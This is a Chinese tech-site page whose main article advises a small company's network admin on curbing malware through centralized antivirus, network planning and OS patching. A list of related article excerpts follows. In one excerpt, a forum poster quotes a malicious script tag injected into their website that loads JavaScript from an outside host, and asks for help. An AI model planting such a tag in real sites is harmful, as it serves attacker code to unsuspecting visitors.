如何解决肆虐企业的恶意代码和病毒

拯救目标:网管老克——围剿肆虐企业的恶意代码和病毒

对象:贸易公司(属于中小企业)

事件:各部门投诉IT部门;财务部:没人下载、却网络慢;客服部:病毒、恶意网站、恶意网址天天弹出。

老克:已经完成的工作:安装了杀毒软件,但有的不更新,有的兼慢卸载了,弹出框不当回事。还是中了木马、病毒,怎么办?

技术总监:全力支持,报预算,钱不是问题。

问题分析:

对于中小企业(比如老克所在的贸易公司)的用户来讲,很多用户自己并不太去关心最近又有什么新的病毒在流行,也不清楚自己的电脑是否已经感染了病毒,虽然公司给每一台客户端安装了杀毒软件;如果遇到重大网络事故,几乎网内所有的机器都得一台一台去处理,而且每一台发生的情况还不一样。像老克这样的网管,一天下来,几乎24小时都在跟机器打交道,心力交瘁,IT部门还吃力不讨好,落得各部门埋怨。

那么,有没有办法解决这些问题呢?我们又不缺少资金,技术总监说了,全力支持,钱不是问题,当然答案是肯定的。

首先、合理规划网络。

其次、统一管理,部署网络版防病毒机软件。

这样,作为管理员的老克可以在终端用户不参与的情况下,直接从控制台上配置、部署和管理整个企业的防毒策略工作,而且实时监控,在客户端设置卸载密码,让其无权限卸载。在安装了网络防毒系统之后,我们基本上从一遍一遍地单机去查毒、杀毒的工作中解脱出来,可以腾出更多的时间去完善其它安全管理方面的工作。

第三、及时为操作系统打安全漏洞补丁。

公司网络拓扑:

计算机病毒">

本栏目更多精彩内容:http://www.bianceng.cnhttp://www.bianceng.cn/Network/Security/

时间: 2024-09-12 13:19:20

如何解决肆虐企业的恶意代码和病毒的相关文章

网站被植入恶意代码,求解决

问题描述 网站被植入恶意代码,求解决 网站被植入恶意代码 <script type="text/javascript" id="clientjs" src="http://mobile.dingsite.com/theapi/getjs?id=3109374&type=30"></script> ,如何防止再次被植入呢 解决方案 如果是虚拟空间,去提供商的管理后台关闭所有文件的写入权限,如果没有这个功能,你只能找到

解决网页恶意代码方案

中介交易 SEO诊断 淘宝客 云主机 技术大厅 网页恶意代码的十一大危害及其解决方案 (一)如何在注册表被锁定的情况下修复注册表 注册表被锁定这一招是比较恶毒的,它使普遍用户即使会简单修改注册表使其恢复的条件下,困难又多了一层.症状是在开始菜单中点击"运行",在运行框中输入regedit命令时,注册表不能够使用,并发现系统提示你没有权限运行该程序,然后让你联系系统管理员. 这是由于注册表编辑器: HKEY_CURRENT_USER\Software\Microsoft\Windows\

恶意代码感染韩国网站网络传播窃取游戏账号

昨日,韩国杀毒软件企业AhnLab宣布消息称,韩国多数网站感染了盗取游戏账号的恶意代码,且该类代码可通过网络传播至其他电脑. 相关恶意代码通过"yahoo.js"恶性脚本传播.当电脑使用者登陆感染"yahoo.js"脚本的网站时,相关脚本会通过Windows系统漏洞将"s.exe"文件植入用户电脑. "s.exe"文件会自动运行,在"C:/Windows/System32"文件夹生成具有键盘记录(KeyLo

诸多网页恶意代码应对之法

网页中我们经常会遇到各种恶意代码,我们应该怎样有针对性的做好预防措施呢? 1.禁止使用电脑 现象描述:尽管网络流氓们用这一招的不多,但是一旦你中招了,后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:"关闭系统"."运行"."注销".注册表编辑器.DOS程序.运行任何程序被禁止,系统无法进入"实模式".驱动器被隐藏. 解决办法:一般来说上述八大现象你都遇上了的话,基本上系统就给"废"了,建议重装. 2

诸多网页恶意代码的分析及应对

网页中我们经常会遇到各种恶意代码,我们应该怎样有针对性的做好预防措施呢? 1.禁止使用电脑 现象描述:尽管网络流氓们用这一招的不多,但是一旦你中招了,后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:"关闭系统"."运行"."注销".注册表编辑器.DOS程序.运行任何程序被禁止,系统无法进入"实模式".驱动器被隐藏. 解决办法:一般来说上述八大现象你都遇上了的话,基本上系统就给"废"了,建议重装. 2

删除恶意代码让win xp系统免受侵扰

  WindowsXP删除恶意代码的方法: 1.解开被禁用的注册表 执行软盘中的"unlockreg.reg"文件,此文件是用记事本建立一个以REG为后缀名的文件,文件名可自定义,内容如下: REGEDIT4 空一行[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] " DisableRegistryTools"=dword:00000000 要注意的是,在"REG

从德国勒索软件活动看恶意代码的生存方式

去年12月,以德语用户,尤其是人事部门工作人员为攻击目标的勒索软件RANSOM_GOLDENEYE.A被发现.Petya(RANSOM_PETYA)与Mischa(RANSOM_MISCHA)两种勒索软件的结合体GoldenEye取名于詹姆·斯邦德007系列的题目,且该勒索软件的攻击向量(attack vector)也如影片所述. 勒索软件在进入瓶颈期的威胁环境中维持着它强大的生命力并且多样地变换攻击目标.GoldenEye通过模仿恶意软件,反映了正在努力扩大攻击范围.影响力和收益的攻击者的活动

Wombie Attack—恶意代码传播的新路径

 雷锋网(公众号:雷锋网)编者按:8月16日,第三届中国互联网安全领袖峰会(CSS 2017)在北京国家会议中心召开.作为九大分会场之一的腾讯安全探索论坛(TSec)以"安全新探索"为主题,云集了国际知名厂商及顶尖高校的资深安全专家,探讨全球信息安全领域前沿技术.研究成果及未来趋势. 腾讯安全玄武实验室的刘惠明.郭大兴带来了一种恶意代码传播的新路径--Wombie Attack.据雷锋网了解,Wombie Attack 技术通过被感染者在地理位置上的移动来实现攻击扩散,类似僵尸题材电影

揭秘手机吸费软件产业链:一款恶意代码月赚10万元

手机吸费有多可怕? 你有没有发现自己手机话费莫名增加?有没有感觉到网络流量消耗得离谱?或者,自己的行踪连同手机号码一并被人"精确转卖"?如果有,那就是背后有恶意代码在"帮忙".日前,一款伪装为"安卓升级补丁" 的吸费软件被截获,其单次群发即可感染5万部手机,月"收益"超10万元.无独有偶,央视月初也披露,仅一款扣费恶意代码,每年偷用户话费就超过5000万元. 众说纷纭手机恶意代码,内幕到底多可怕?记者调查了解到,业内人士认为&